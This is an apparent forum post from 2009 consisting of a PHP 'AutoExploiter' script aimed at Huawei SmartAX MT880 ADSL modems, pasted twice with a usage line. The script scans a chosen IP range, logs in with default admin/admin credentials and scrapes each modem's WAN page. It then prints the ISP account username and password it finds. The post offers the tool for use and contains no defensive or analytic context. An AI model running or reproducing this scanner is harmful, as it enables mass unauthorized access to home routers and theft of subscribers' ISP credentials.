Lucas
18.02.2009, 15:47
<?
#!/usr/bin/php
error_reporting(0);
set_time_limit(0);
if ($argc<3) {
print "[==============================================]\n";
print "[ AutoExploiter ADSL-modem beta 0.1 ]\n";
print "[ Grab account [ FreeInet ] ]\n";
print "[ Modem target: HUAWEI SmartAX MT880 ]\n";
print "[ Author: PowerWMZ / Date: 10/08/2008 ]\n";
print "[==============================================]\n";
print "USAGE:\n";
print " [start_ip] - Start target ip\n";
print " [end_ip] - End target ip\n";
print "SIMPLE:\n";
print " ]$ php {$argv[0]} 192.168.0.1 192.168.12.254\n";
print "\n";
die;
}
$start = $argv[1];
$end = $argv[2];
print "[+] Grab accounts... ";
$i=ip2long($start);
while($i<=ip2long($end))
{
$ip = long2ip($i);
$auth_sock = fsockopen($ip, 80, $error, $errstr, 3);
if($auth_sock==false){}
else {
$user = "admin";
$pass = "admin";
$breq = "GET /WAN.html HTTP/1.0\r\n";
$breq .= "Host: ".$ip."\r\n";
$breq .= "User-Agent: Google-bot\r\n";
$breq .= "Content-Type: text/html; charset=utf-8\r\n";
$breq .= "Connection: Keep-Alive\r\n";
$breq .= "Authorization: Basic ".base64_encode($user.":".$pass)."\r\n\r\n";
unset($buff);
fputs($auth_sock, $breq);
while (!feof($auth_sock))
{
$buff[] = fgets($auth_sock,1024);
}
if (array_key_exists(336, $buff)) {
$sum[0] = $buff[336];
$sum[1] = $buff[338];
$x=0; while($x < 2){
$s = strstr($sum[$x],'VALUE=');
$nm = strpos($s,'onBlur=');
$result = substr($s,7,$nm - 7);
$check[] = preg_replace("|\"|", "", $result);
$x++;
}
print "\n[-] Ip: ".$ip." | ";
print "Username: ".$check[0]." | ";
print "Password: ".$check[1];
}
}
fclose($auth_sock);
$i++;
}
print "\n[!] Done!\n";
?>
use script:
php.exe script.php 192.168.0.1 192.168.12.254
#!/usr/bin/php
error_reporting(0);
set_time_limit(0);
if ($argc<3) {
print "[==============================================]\n";
print "[ AutoExploiter ADSL-modem beta 0.1 ]\n";
print "[ Grab account [ FreeInet ] ]\n";
print "[ Modem target: HUAWEI SmartAX MT880 ]\n";
print "[ Author: PowerWMZ / Date: 10/08/2008 ]\n";
print "[==============================================]\n";
print "USAGE:\n";
print " [start_ip] - Start target ip\n";
print " [end_ip] - End target ip\n";
print "SIMPLE:\n";
print " ]$ php {$argv[0]} 192.168.0.1 192.168.12.254\n";
print "\n";
die;
}
$start = $argv[1];
$end = $argv[2];
print "[+] Grab accounts... ";
$i=ip2long($start);
while($i<=ip2long($end))
{
$ip = long2ip($i);
$auth_sock = fsockopen($ip, 80, $error, $errstr, 3);
if($auth_sock==false){}
else {
$user = "admin";
$pass = "admin";
$breq = "GET /WAN.html HTTP/1.0\r\n";
$breq .= "Host: ".$ip."\r\n";
$breq .= "User-Agent: Google-bot\r\n";
$breq .= "Content-Type: text/html; charset=utf-8\r\n";
$breq .= "Connection: Keep-Alive\r\n";
$breq .= "Authorization: Basic ".base64_encode($user.":".$pass)."\r\n\r\n";
unset($buff);
fputs($auth_sock, $breq);
while (!feof($auth_sock))
{
$buff[] = fgets($auth_sock,1024);
}
if (array_key_exists(336, $buff)) {
$sum[0] = $buff[336];
$sum[1] = $buff[338];
$x=0; while($x < 2){
$s = strstr($sum[$x],'VALUE=');
$nm = strpos($s,'onBlur=');
$result = substr($s,7,$nm - 7);
$check[] = preg_replace("|\"|", "", $result);
$x++;
}
print "\n[-] Ip: ".$ip." | ";
print "Username: ".$check[0]." | ";
print "Password: ".$check[1];
}
}
fclose($auth_sock);
$i++;
}
print "\n[!] Done!\n";
?>
use script:
php.exe script.php 192.168.0.1 192.168.12.254